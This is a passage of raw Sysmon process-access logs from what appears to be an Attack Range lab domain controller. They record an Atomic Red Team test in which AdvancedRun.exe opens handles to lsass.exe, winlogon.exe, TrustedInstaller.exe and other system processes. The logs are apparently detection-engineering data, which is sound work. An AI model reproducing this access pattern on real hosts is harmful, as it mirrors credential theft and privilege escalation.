TEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003983128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 